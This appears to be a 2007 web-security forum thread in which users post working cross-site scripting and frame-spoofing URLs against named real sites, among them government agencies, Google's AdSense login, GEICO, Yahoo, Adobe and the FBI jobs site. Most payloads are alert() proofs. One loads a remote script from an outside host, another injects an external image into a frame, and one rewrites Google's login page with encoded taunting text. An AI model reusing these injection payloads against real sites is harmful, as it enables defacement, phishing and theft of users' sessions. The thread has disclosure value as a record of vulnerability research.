XSSQLi - deadly combo...

http://www.mrrc.de/aktuell/index.php?start=20OR%20%3Cscript%3Ealert(1);%3C/script%3E=%201&first=1

http://www.bmsg.gv.at/cms/site/search.html?query=Sucht%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&Submit=Ab

https://www.moneybookers.com/app/directory.pl?s=touch+me%22%20onmouseover=alert('XSS')%20%22
touch the search field `and money moves`

http://moneygram.com/Market/Market.htm?CC=A"onmouseover="alert(this.innerText);"&LC=EN

mouseover the navigation links.

-tx @ lowtech-labs.org

rather frame spoofing than XSS, anyway feel happy if your flight is controlled by DFS ;-)
http://www.dfs.de/dfs/internet/deutsch/inhalt/company_future/index.html?ionasFrameCheckName=haupt&ionasFrameCheckUrl=http%3A//ha.ckers.org/images/stallowned.jpg

In the frontline to copyright your XSS
http://www.gvu.de/de/suche/suche.php?action=search&configurationId=deutsch&term=qwq%22%3E%3Cscript%3Ealert('Copyright%20XSS')%3C/script%3E



Edited 1 time(s). Last edit at 02/03/2007 03:59AM by kirke.

http://www.adobe.com/cfusion/gpr/index.cfm?v=3&product=Flash&loc=en&country=us&platform=2&givenName=test&familyName=test&email=asdf@asdf.com&optin=0&serialNumber=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

[[url=http://tinyurl.com/27egej]namecheap[/url]]

yes I'm good ;-)

google XSS flaw by me ( http://www.mybeNi.tk )

https://www.google.com/accounts/ServiceLogin?service=adsense&hl=de&ifr=true&passive=true&rm=hide&afpui=3&nui=15&alwf=true&continue=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&followup=https%3A%2F%2Fwww.google.com%2Fadsense%2Fgaiaauth&ltmpl=%22%3E%3Cscript%3Edocument.body.innerHTML%3DString.fromCharCode(104,101,104,101,44,32,120,115,115,32,111,110,32,103,111,111,103,108,101,39,115,32,104,116,116,112,115,32,108,111,103,105,110,32,115,99,114,101,101,110,32,45,32,115,97,121,32,119,104,48,48,116,46,32,119,97,105,116,32,119,105,116,104,32,98,108,111,103,103,105,110,103,32,105,116,32,117,110,116,105,108,32,105,32,112,117,116,32,97,100,115,101,110,115,101,32,111,110,32,109,121,32,112,97,103,101,44,32,40,115,111,114,114,121,32,97,32,115,101,118,101,110,116,101,101,110,32,110,101,101,100,115,32,115,111,109,101,32,109,111,110,101,121,44,32,116,111,111,41,46,60,98,114,62,60,98,114,62,10,60,98,114,62,10,118,105,115,105,116,32,109,121,32,112,97,103,101,32,119,119,119,46,109,121,98,101,78,105,46,116,107,32,97,110,100,32,114,101,109,101,109,98,101,114,58,32,121,111,117,32,111,119,101,32,117,115,32,119,104,105,116,101,104,97,116,115,32,97,32,102,117,99,107,105,110,32,108,111,116,32,59,45,41,60,98,114,62,10,60,98,114,62,10,45,45,98,101,78,105,60,98,114,62)%3C/script%3E


cheers

btw they were notified.



Edited 2 time(s). Last edit at 02/08/2007 09:16AM by alf.

I'm gonna go ahead and throw these up here because it appears to be fixed in Joomla 1.0.12 (although that may only be with sites that are using SEF URLs, I'm gonna test it further this evening).
In any event:
http://www.joomlapolis.com/content/view/2522/";//><script>alert(String.fromCharCode(88,83,83));</script><p%20id="3/

http://virtuemart.net/index.php?option=com_content&task=view&id=207";//></script><script>alert(1);var%20i="i

http://virtuemart.net/index.php?option=com_docman&Itemid=66";//><script>alert(1);</script><p%20id="3

http://virtuemart.net/index.php?option=com_weblinks&catid=";//><script>alert(1);</script><p%20id="3

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/07/2007 08:15PM by tx.

http://www.budget.com/budgetSearch/SiteSearch.jsp?ui_mode=question&question_box=%22;alert(String.fromCharCode(88,83,83))//

http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=<script>alert('xss')</script>&docid=f:

http://ats.nist.gov/cgi-bin/cgi.tcl/display.cgi?scriptname=<img%20src=javascript:alert('xss');>

xss with error & script info displayed:
http://cindex.camden.gov.uk/inform/cgi/inquire.cgi?nextpage=<script>alert('xss')</script>

cleaner output of the above url (no xss):
http://cindex.camden.gov.uk/inform/cgi/inquire.cgi?nextpage=lol

http://www.csm.ornl.gov/~geist/cgi-bin/enote.cgi?nb=<script>alert('xss')</script>&action=view&page=85

http://www.ca.sandia.gov/HiTempThermo/cgi-bin/chemkin.cgi?PAGE=results&ID=<script>alert('xss')</script>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com



Edited 4 time(s). Last edit at 02/09/2007 08:01PM by Luny.

http://myweb2.search.yahoo.com/myweb?ei=UTF-8&.done=%27%20style%3dbackground:url%28javascript:alert%28%27xss%27%29%29%20&friendid=eYGyEA_zSZKZmLtPfIvJA_jao9ab
http://www.yahoo.americangreetings.com/kwsearch.pd?btnsearch=submit&strSearch=%22%20style=background:url%28javascript:alert%28%27xss%27%29%29%20a
IE6 only

http://search.xanga.com/searchxanga.aspx?q=%22%3e%3cscript%3ealert%28%27xss%27%29%3c/script%3e
http://www.jobsdb.com/HK/EN/V6/JS/JobSearch/JobSearch.asp?PN=JobListing&pagename=adslist&searchtext=%22%3e%3cscript%3ealert%28%27xss%27%29%3c/script%3e
http://search.tom.com/search.php?word=%3c/title%3e%3Cscript%3Ealert%28%27xss%27%29%3c/script%3e&edt=

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:04AM by Hong.

Go to
http://www.fbijobs.gov/searchresult.asp

and enter <script>alert("xss");</script> in the search field. I tried to find whiteacids script that forwards post vulns... But I couldnt.

-bubbles
http://webmastertutorials.net

You fat:

http://www.rawrcore.net/?page_id=3

.GOV EXPLOITS! H0mGAZ!11

http://www.rawrcore.net/?p=9

and I guess I'll throw this one out there because I published like a year ago and no one seemed to care:

https://secure.geico.com/hr/jobapp.do?PERSONAL_DATA_firstName=lawl%22%3E%3Cbody%20onload=%22alert('lol');document.write('An%20XSS%20so%20easy,%20even%20a%20caveman%20can%20do%20it.');%22%3E%3Cspan

WHY DOES EVERYONE IGNORE MY EXPLOITS!!??! WAHHH!!1

bubbles, you don't need the post forwarder. This form accepts GET input: http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert%28%22xss%22%29%3B%3C%2Fscript%3E

But this one has been there already: http://sla.ckers.org/forum/read.php?3,44,5450#msg-5450

It is ironical... http://marketwatch.nytimes.com/custom/nyt-com/html-story.asp?guid=%7BC63C20D8-A8F1-439B-8D74-3E05F8900D87%7D&symb=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cnada%20a=%22



Edited 1 time(s). Last edit at 02/13/2007 12:25PM by trev.

Lockdown Wrote:
>
> https://secure.geico.com/hr/jobapp.do?PERSONAL_DAT
> A_firstName=lawl%22%3E%3Cbody%20onload=%22alert('l
> ol');document.write('An%20XSS%20so%20easy,%20even%
> 20a%20caveman%20can%20do%20it.');%22%3E%3Cspan
>
>

Funny how much they spend on TV ads, and apparently little on the IT side.

I love their TV commercials, though, LOL.

@Trev
Yeah, I figured it had been found already, but I didnt want to search through 39 pages to find it :)

-bubbles
http://webmastertutorials.net

bubbles, you don't have to - that's what the forum search is for.

Orly, I didnt even know this forum had a search... I'll keep that in mind for next time.

-bubbles
http://webmastertutorials.net

<3 Geico commercials.

Cigarrettes http://www.smokerswelcome.com/CAM/dtclogin.jsp?brand=lolhai%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&code=noResultsFound

-Lockdown-

http://www.rawrcore.net



Edited 2 time(s). Last edit at 02/15/2007 01:55AM by Lockdown.

http://www.networkcomputing.com/nopagefound.jhtml;?_requestid=355582974";alert(String.fromCharCode(88,83,83));ds_pageName="

-tx @ lowtech-labs.org

nice list with mainly (i)frame spoofing again, posting from SkyOut seen at lists.grok.org.uk/pipermail/full-disclosure/2007-February/052496.html :

http://baseportal.com/baseportal/phishmarkt/at

your money is as save as XSS in austria ;-)

http://www.mpaa.org/search_resultIndexServer.asp?query=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E&start=0&image1.x=0&image1.y=0

- RSnake
Gotta love it. http://ha.ckers.org

nice one!

-tx @ lowtech-labs.org

http://www.billoreilly.com/search/searchresultsframe.jsp?searchstring=%22%3E%3CScript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&x=0&y=0&sortby=0&sortdir=1&searchcategory=0

XSS friendly site, inserts type="text/javascript" if we forget it :-))

http://www.bvdw.org/index.php?id=83&no_cache=1&tx_newloginbox_pi1%5Bforgot%5D=42%22%3E%3Cscript%3Ealert(String.fromCharCode(88,88,83))%3C/script%3E

ROFL @ Above

We know we're insecure, but we can't have hackers not adhering to w3c standards!

-Lockdown-

http://www.rawrcore.net

Hahah! I've never seen that before. How nice of them to help you out like that.

- RSnake
Gotta love it. http://ha.ckers.org